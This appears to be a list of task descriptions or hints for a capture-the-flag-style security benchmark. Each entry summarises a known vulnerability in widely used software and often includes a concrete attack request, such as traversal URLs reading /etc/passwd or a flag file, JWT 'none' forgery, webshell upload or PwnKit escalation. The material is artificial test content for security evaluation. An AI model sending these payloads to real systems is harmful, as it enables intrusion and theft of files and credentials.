Unsafe use of concat demuxer in FFmpeg allows reading local files via crafted playlist when processing untrusted video files.

Upload arbitrary file via Flink REST API with path traversal in filename parameter to write outside designated upload directory. Chain with JAR execution for RCE.

Unauthenticated path traversal via Flink REST: GET /jobmanager/logs/..%252F..%252F..%252Fflag_proof reads arbitrary files from JobManager filesystem.

Path traversal in GitLab API export feature. Authenticated user downloads repository export with path traversal to read files outside the export directory.

GlassFish 4.x path traversal via /../ sequences in URL allows reading arbitrary files. Navigate to /theme/META-INF/../../../flag_proof to extract flag.

Path traversal in Gradio file serving endpoint. Request /file=../../../flag_proof to read arbitrary files from server without authentication.

Unauthenticated file read in Gradio via absolute path traversal in /file= endpoint. Access any file readable by the Gradio process.

Path traversal: GET /public/plugins/<plugin>/../../../etc/flag_proof. No authentication. Read any file accessible by grafana process.

Path traversal via %2e%2e URL encoding in Apache 2.4.49. GET /cgi-bin/.%2e/.%2e/.%2e/flag_proof. Enable mod_cgi for RCE.

Bypass CVE-2021-41773 patch via double encoding (%%32%65%%32%65) to traverse outside docroot. Execute OS commands with mod_cgi enabled.

Craft PNG with text chunk 'profile /flag_proof'. ImageMagick embeds file contents in output image metadata during convert. Extract via identify.

Jenkins CLI @-argument file read: use @/etc/passwd pattern to read server files. Chain with credential extraction and script console for RCE.

LFI in Kibana console API: /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../ includes and executes arbitrary JS files from server.

Path traversal in librsvg when processing SVG with xlink:href containing local file path. Embed local files in rendered SVG output.

Path traversal in Metabase GeoJSON API endpoint. Request /api/geojson?url=file:///flag_proof to read arbitrary files without authentication.

mini_httpd path traversal allows reading files outside web root. Request GET /../../../flag_proof HTTP/1.0 to retrieve the flag file directly.

n8n code node sandbox escape allows RCE. Exploit prototype pollution in workflow code node to break out of VM2 sandbox and execute OS commands.

Path traversal in Nexus Repository Manager allows unauthenticated file read. GET /%2F%2F%2F%2F..%2F..%2F..%2Fetc%2Fpasswd to read sensitive files including flag.

Node.js path traversal in serve-static via encoded characters. Request /../../flag_proof with encoded slashes to read files outside web root.

PHPMailer local file disclosure via crafted email attachment path. Send email with file:///flag_proof as attachment to read local files through mail log.

phpMyAdmin local file inclusion via improper whitelist check in bf_pdf_table.php. Chain with session poisoning to include PHP session file as local code.

aiohttp static file serving path traversal. Request GET /static/../../../flag_proof to read files outside web root in vulnerable aiohttp versions.

Ruby on Rails path traversal in Sprockets static asset serving. Request /assets/../../../etc/passwd with encoded traversal sequences to read arbitrary files.

Rails file content disclosure via Content-Type header manipulation. Set Accept: ../../../flag_proof{{}} to trigger path traversal in template rendering.

Apache Solr remote streaming file read via stream.url or stream.file parameter. Enable RemoteStreaming in solrconfig.xml then read arbitrary files via query parameter.

Struts2 file upload path traversal and RCE via filename manipulation. Upload file with ../traversal in filename combined with multipart injection to write webshell.

Struts2 authentication bypass via OGNL expression in token validation. Forge action token using OGNL injection to bypass token-based CSRF protection and access protected actions.

ThinkPHP 6.x lang parameter local file inclusion leading to RCE. Set think-lang cookie to path traversal value, upload PHP code via another endpoint, include to execute.

uWSGI path traversal via encoded slashes in PATH_INFO. Request /..%2F..%2F..%2Fflag_proof to traverse outside document root and read flag file.

Vite dev server arbitrary file read via path traversal in URL. Request /@fs/etc/passwd or /@fs/flag_proof to read files via Vite's file system exposure in dev mode.

Vite dev server path traversal bypass via query string manipulation. Append ?import& to bypass server.fs.deny restrictions and read arbitrary files from filesystem.

Authenticated file deletion in Discuz! X3.4 via crafted avatar upload path. Delete config.inc.php to reset installation and create admin account.

Django debug view XSS via crafted URL. Debug mode exposes stack traces with internal paths and settings potentially leaking SECRET_KEY.

Open redirect in Django CommonMiddleware when APPEND_SLASH=True and DEBUG=False. Redirect to attacker-controlled URL via crafted request path.

Misconfigured DNS server allows unauthenticated zone transfer (AXFR). Query all DNS records to discover internal hostnames and IP mappings.

Apache HTTP Server mod_rewrite newline injection. Inject \n in redirect URL to split HTTP response and inject headers/body for cache poisoning or session fixation.

Apache PHP CGI parsing bug: upload file.php.jpg, Apache serves it as PHP due to mod_negotiation/mod_mime misconfiguration executing PHP code.

Jetty path traversal via encoded double-dot segments in URI. Request /%2e/WEB-INF/web.xml bypasses security constraints to read protected resources.

Jetty DefaultServlet double-decoding path traversal. Request /%2F/ sequences expose file contents from outside the servlet context root.

Jetty URI encoding bypass to access WEB-INF directory. Use %u0000 or %2F sequences to bypass security constraints and read protected files.

MinIO information disclosure exposes environment variables including credentials via POST /minio/health/cluster?verify. Extract MINIO_SECRET_KEY as flag.

Nginx path traversal via null byte in URI before static file extension. Request /uploads/evil.php%00.png to execute PHP code uploaded as image file.

Nginx integer overflow in range filter allows memory disclosure. Send Range: bytes=-17208 header to retrieve memory contents from previous request including sensitive data.

Nginx misconfiguration allows path traversal via alias directive without trailing slash. Access /static../etc/passwd by exploiting alias stripping behavior.

Nginx+PHP-FPM path confusion vulnerability. Upload image.jpg containing PHP code, access as /image.jpg/nonexistent.php to trigger PHP-FPM execution.

Nginx-UI authentication bypass via JWT algorithm confusion. Forge admin JWT token using none algorithm to access configuration API and execute nginx config injection.

OpenSSH user enumeration via timing difference in authentication responses. Use timing oracle to enumerate valid usernames, then brute-force credentials to login and read flag.

Heartbleed: OpenSSH/TLS heartbeat extension buffer over-read leaks server memory. Send crafted heartbeat request to extract memory containing private keys and session tokens.

OpenSSL infinite loop in BN_mod_sqrt() via crafted certificate. Trigger DoS with malformed EC certificate, then exploit accompanying service vulnerability to read flag.

ownCloud GraphAPI app discloses phpinfo() including environment variables. Access /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php to extract FLAG env var.

Polkit pkexec local privilege escalation via argument array manipulation. Compile and run PwnKit exploit on the system to escalate to root and read /flag_proof.

PostgreSQL search_path injection allows privilege escalation. Create malicious function in public schema that gets executed with elevated privileges when superuser runs query.

SaltStack authentication bypass in salt-master ClearFuncs. Call _send_pub() and _auth_info() methods without authentication to bypass access controls and execute commands on minions.

V2Board privilege escalation via JWT secret disclosure in config. Extract JWT secret from database, forge admin token, and access privileged API endpoints.